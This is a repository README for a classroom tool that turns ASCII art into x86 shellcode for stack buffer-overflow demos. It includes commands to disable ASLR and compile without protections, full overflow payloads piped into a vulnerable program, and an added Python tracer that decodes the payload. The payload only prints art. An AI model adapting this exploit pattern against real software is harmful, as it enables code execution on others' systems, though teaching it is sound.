nickcjohnston/ascii-art-shellcode

ascii-art-shellcode

Generate shellcode to print ascii art for simple buffer overflows. Mostly wrote this so I can make examples in class more interesting.

Includes a sample ascii art file taken from https://asciiart.website/index.php?art=animals/bats

The basic usage below assumes ASLR is disabled (e.g. sudo sysctl kernel.randomize_va_space=0 on Debian).

Basic Usage

$ python3 ./ascii_art_shellcode.py bats.ascii

Output

Reading art file bats.ascii
Done reading art file
Need 3 bytes. Adding space characters (\0x20)
Compile line: gcc -fno-builtin -O0 -z execstack -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -m32 vuln.c -o vuln.out
Run this command to test your overflow:
printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc9\x51\xb8\x09\x20\x20\x20\xfe\xc0\x50\x68\x2e\x2e\x2f\x5c\x68\x20\x20\x2f\x5c\x68\x20\x20\x20\x20\xb8\x5f\x09\x20\x20\xfe\xc4\x50\x68\x5f\x2e\x2e\x5f\x68\x20\x20\x20\x5f\x31\xc0\xb0\x01\xc1\xe0\x10\x05\x2f\x5c\x09\x20\x50\x68\x2f\x5c\x2e\x2e\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x89\xe1\xb2\x24\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x1f\xd2\xff\xff" | ./vuln.out

Using the output

$ printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc9\x51\xb8\x09\x20\x20\x20\xfe\xc0\x50\x68\x2e\x2e\x2f\x5c\x68\x20\x20\x2f\x5c\x68\x20\x20\x20\x20\xb8\x5f\x09\x20\x20\xfe\xc4\x50\x68\x5f\x2e\x2e\x5f\x68\x20\x20\x20\x5f\x31\xc0\xb0\x01\xc1\xe0\x10\x05\x2f\x5c\x09\x20\x50\x68\x2f\x5c\x2e\x2e\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x89\xe1\xb2\x24\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xd1\xff\xff" | ./vuln.out
0xffffd1ff

/\../\
    __..__
        /\../\

Segmentation fault

Note, you might need to change the last few bytes of the shellcode to match the address that the sample vulnerable program spits out, depending on how you executed the program. Running it in an IDE tends to offset things a bit.
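To check what a generated payload does without running it, this added example (not part of this repository) traces the shellcode body from the Output section and decodes the 4-byte return address at the end of the payload. It handles only the instructions that appear in that payload; the names trace_syscall and ret_addr are made up for this example.

```python
# Shellcode body copied from the Output section (NOP padding and the final
# 4-byte return address left out). bytes.fromhex ignores the spaces.
BODY = bytes.fromhex(
    "31c9 51 b809202020 fec0 50 682e2e2f5c 6820202f5c 6820202020 "
    "b85f092020 fec4 50 685f2e2e5f 682020205f 31c0 b001 c1e010 "
    "052f5c0920 50 682f5c2e2e 31c0 31db 31c9 31d2 b004 b301 89e1 b224 cd80"
)
XOR_SELF = {0xC0: "eax", 0xC9: "ecx", 0xD2: "edx", 0xDB: "ebx"}  # 31 /r zeroing
MOV_LOW8 = {0xB0: "eax", 0xB2: "edx", 0xB3: "ebx"}               # mov al/dl/bl, imm8

def ret_addr(payload: bytes) -> int:
    """Decode the little-endian return address that ends the payload."""
    return int.from_bytes(payload[-4:], "little")

def trace_syscall(code: bytes):
    """Trace up to int 0x80; return (eax, ebx, edx bytes at ESP). Nothing is executed."""
    r = dict(eax=0, ebx=0, ecx=0, edx=0)
    stack, i = b"", 0
    while i < len(code):
        op = code[i]
        nxt = code[i + 1] if i + 1 < len(code) else None
        imm = int.from_bytes(code[i + 1:i + 5], "little")
        if op == 0x68:                            # push imm32
            stack, i = code[i + 1:i + 5] + stack, i + 5
        elif op in (0x50, 0x51):                  # push eax / push ecx
            reg = r["eax" if op == 0x50 else "ecx"]
            stack, i = reg.to_bytes(4, "little") + stack, i + 1
        elif op == 0xB8:                          # mov eax, imm32
            r["eax"], i = imm, i + 5
        elif op == 0x05:                          # add eax, imm32
            r["eax"], i = (r["eax"] + imm) & 0xFFFFFFFF, i + 5
        elif op == 0xC1 and nxt == 0xE0:          # shl eax, imm8
            r["eax"], i = (r["eax"] << code[i + 2]) & 0xFFFFFFFF, i + 3
        elif op == 0xFE and nxt in (0xC0, 0xC4):  # inc al (C0) / inc ah (C4)
            sh = 0 if nxt == 0xC0 else 8
            byte = ((r["eax"] >> sh) + 1) & 0xFF
            r["eax"], i = (r["eax"] & ~(0xFF << sh)) | (byte << sh), i + 2
        elif op == 0x31 and nxt in XOR_SELF:      # xor reg, reg
            r[XOR_SELF[nxt]], i = 0, i + 2
        elif op in MOV_LOW8:                      # mov al/dl/bl, imm8
            name = MOV_LOW8[op]
            r[name], i = (r[name] & 0xFFFFFF00) | nxt, i + 2
        elif op == 0x89 and nxt == 0xE1:          # mov ecx, esp (no push follows here)
            i += 2
        elif op == 0xCD and nxt == 0x80:          # int 0x80: stop tracing
            break
        else:
            raise ValueError(f"unhandled opcode {op:#04x} at offset {i}")
    return r["eax"], r["ebx"], stack[:r["edx"]]
```

The trace comes out as syscall 4 (write) on fd 1 with the 36 art bytes, ending in the three padding spaces the tool reported. Calling ret_addr on the two payload endings gives 0xffffd21f for the tool's output and 0xffffd1ff for the run shown above, which is the address vuln.out printed.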
